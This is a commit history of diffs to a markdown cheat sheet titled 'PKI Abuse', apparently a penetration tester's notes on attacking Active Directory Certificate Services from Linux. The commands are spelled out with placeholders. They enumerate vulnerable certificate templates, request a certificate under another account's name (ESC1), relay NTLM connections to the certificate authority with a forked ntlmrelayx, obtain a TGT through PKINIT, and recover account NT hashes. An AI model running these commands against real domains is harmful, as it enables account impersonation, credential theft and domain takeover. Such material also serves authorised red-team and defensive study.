johnjohnsp1 · September 20, 2021 14:10 · Sep 19, 2021 · Sep 18, 2021 · Sep 18, 2021 · Sep 18, 2021
diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -23,7 +23,7 @@ Set the env var to the output ccache
 export KRB5CCNAME=<username>.ccache
 ```
 
-Enumerate Certificate Autherties on the domain (CA's)
+Enumerate Certificate Authorities on the domain (CA's)
 ```shell
 python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class ca
 ```

diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -36,7 +36,18 @@ python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enabl
 ## Requesting certs from CA Linux
  Requesting a cert with an alt subject name (ESC1)
  ```shell
-
+python3 certi.py req '<domain>/<username>@<ca-server>' <ca-service-name> -k -n --dc-ip <dc-ip> --template <vuln-template> --alt-name <target-domain-account>
+```
+## Authenticating using cert on Linux
+
+Request an TGT from Certificate with Client Auth or Smart Card Auth
+```shell
+python3 gettgtpkinit.py <domain>/<username> -cert-pfx <pfx-certificate-file> -pfx-pass <certificate-password> admin_tgt.ccache   
+ ```
+
+Get NTHash from requestd TGT above (KEY is outputed from the command above) 
+```shell
+python3 getnthash.py -key <AS-REP-encryption-key> -dc-ip <dc-ip> <domain>/<username> output_tgt.ccache
 ```
 
 ## Relaying On Linux

diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -34,7 +34,10 @@ python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enabl
 ```
 
 ## Requesting certs from CA Linux
-
+ Requesting a cert with an alt subject name (ESC1)
+ ```shell
+
+```
 
 ## Relaying On Linux
 

diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -1,5 +1,9 @@
 # PKI Abuse
 
+Some golden links when you are having issues:
+https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
+
+
 ## Enumerating ADCS On Linux
 
 Download and install Certi

diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -6,12 +6,12 @@ Download and install Certi
 ```shell
 git clone https://github.com/eloypgz/certi
 cd certi
-python3 setup.py install
+sudo python3 setup.py install
 ```
 
 Certi only support kerberos auth, so to perform authenticated enumeration, you need to fetch a TGT for a valid user first.
 ```shell
-getTGT.py '<domain>/<username>:<password>' <username>.ccache
+getTGT.py '<domain>/<username>:<password>' -dc-ip <dc-ip>
 ```
 Set the env var to the output ccache
 

diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -29,6 +29,9 @@ Enumerate vuln templates
 python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enable
 ```
 
+## Requesting certs from CA Linux
+
+
 ## Relaying On Linux
 
 Relaying incoming SMB/HTTP connection to ADCS to generate a certificate on

diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -5,7 +5,7 @@
 Download and install Certi
 ```shell
 git clone https://github.com/eloypgz/certi
-certi
+cd certi
 python3 setup.py install
 ```
 
@@ -33,14 +33,14 @@ python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enabl
 
 Relaying incoming SMB/HTTP connection to ADCS to generate a certificate on
 
-First we need to fetch and install a custom fork of impacket
+Fetch and install a custom fork of impacket
 ```shell
 git clone https://github.com/ExAndroidDev/impacket.git
 cd impacket
 git checkout ntlmrelayx-adcs-attack
 ```
 
-The we need to create a virutal python env to contain this verison of impacket (Avoid breaking the release you already have installed)
+Create a virtual python env to contain this version of impacket (Avoid breaking the release you already have installed)
 ```shell
 apt install python3-venv
 python3 -m venv adcs-impacket
@@ -61,8 +61,7 @@ You can now setup ntlmrelay for realying
 python3 examples/ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>
 ```
 
-
-## Authencatin using certificate on Linux
+## Authentication using certificate on Linux
 ```shell
 python3 gettgtpkinit.py <domain>/<username> -pfx-base64 $(cat <base64-cert.file>) -dc-ip <dc-ip> out_tgt.ccache
 ```
diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -1,7 +1,35 @@
 # PKI Abuse
 
+## Enumerating ADCS On Linux
 
-## Linux Commands
+Download and install Certi
+```shell
+git clone https://github.com/eloypgz/certi
+certi
+python3 setup.py install
+```
+
+Certi only support kerberos auth, so to perform authenticated enumeration, you need to fetch a TGT for a valid user first.
+```shell
+getTGT.py '<domain>/<username>:<password>' <username>.ccache
+```
+Set the env var to the output ccache
+
+```shell
+export KRB5CCNAME=<username>.ccache
+```
+
+Enumerate Certificate Autherties on the domain (CA's)
+```shell
+python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class ca
+```
+
+Enumerate vuln templates
+```shell
+python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enable
+```
+
+## Relaying On Linux
 
 Relaying incoming SMB/HTTP connection to ADCS to generate a certificate on
 
@@ -28,7 +56,13 @@ Still inside the impacket folder
 pip3 install .
 ```
 
-You can now setup ntlmrelay
-````
+You can now setup ntlmrelay for realying 
+```shell
 python3 examples/ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>
 ```
+
+
+## Authencatin using certificate on Linux
+```shell
+python3 gettgtpkinit.py <domain>/<username> -pfx-base64 $(cat <base64-cert.file>) -dc-ip <dc-ip> out_tgt.ccache
+```
diff --git a/PKI_Abuse_cheatsheet.md b/PKI_Abuse_cheatsheet.md
@@ -0,0 +1,34 @@
+# PKI Abuse
+
+
+## Linux Commands
+
+Relaying incoming SMB/HTTP connection to ADCS to generate a certificate on
+
+First we need to fetch and install a custom fork of impacket
+```shell
+git clone https://github.com/ExAndroidDev/impacket.git
+cd impacket
+git checkout ntlmrelayx-adcs-attack
+```
+
+The we need to create a virutal python env to contain this verison of impacket (Avoid breaking the release you already have installed)
+```shell
+apt install python3-venv
+python3 -m venv adcs-impacket
+```
+
+Move "into" this virutal env 
+```shell
+source adcs-impacket/bin/activate
+```
+Still inside the impacket folder
+
+```shell
+pip3 install .
+```
+
+You can now setup ntlmrelay
+````
+python3 examples/ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>
+```